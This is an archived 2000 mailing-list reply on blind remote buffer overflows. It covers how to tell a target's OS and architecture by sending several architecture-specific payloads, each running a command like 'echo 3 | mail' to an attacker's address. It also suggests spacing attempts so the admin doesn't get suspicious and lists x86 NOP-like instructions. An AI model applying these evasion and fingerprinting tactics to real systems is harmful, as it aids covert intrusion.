Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Blind Remote Buffer Overflow

From: matej () POBOX SK (matej)
Date: Tue, 2 May 2000 08:24:46 +0200

On Mon, May 01, 2000 at 05:59:05PM -0700, Blue Boar wrote:

Some people have mentioned some ways to try to find a vulnerability
remotely. Now, lets say you using some way have determined you can rewrite
EIP, PC (or whatever it's called on your architecture). What now to do to
detect operating system and architecture?


In many cases, you will have more than one shot at trying your
buffer overflow.  One possibility is just trying them all.  If the
service doesn't auto-restart, then try each arch a week apart, so the
admin doesn't get suspicious.


...or try in one shot 3 bufflows for 3 hw platforms :-)


a number of variants (as an example: Linux/i386, Linux/sparc,
Windows/i386) which all of them does something like "echo 3 | mail
badguy () test com". Depending upon what mail you actually get back, you know
that the architecture is at least quite compatible with the envioronents
that returns an answer.


Who knows their x86 and Sparc opcodes really well?


on x86 I can find couple of such instructions - ranging from completely
NOP-like, to some form of semi-NOPs. just think of 'mov eax, eax' or 'jmp
$+length_of_instr', or take some of the semi-NOPs - 'and eax, eax' (changes
flags, as well as 'or' etc), and think about some instruction pairs - like
'cmc; cmc' (complement cary, twice;-)

however, I do not know _nothing_about the sparc instr set...

matej
Previous By Date Next
Previous By Thread Next

Current thread: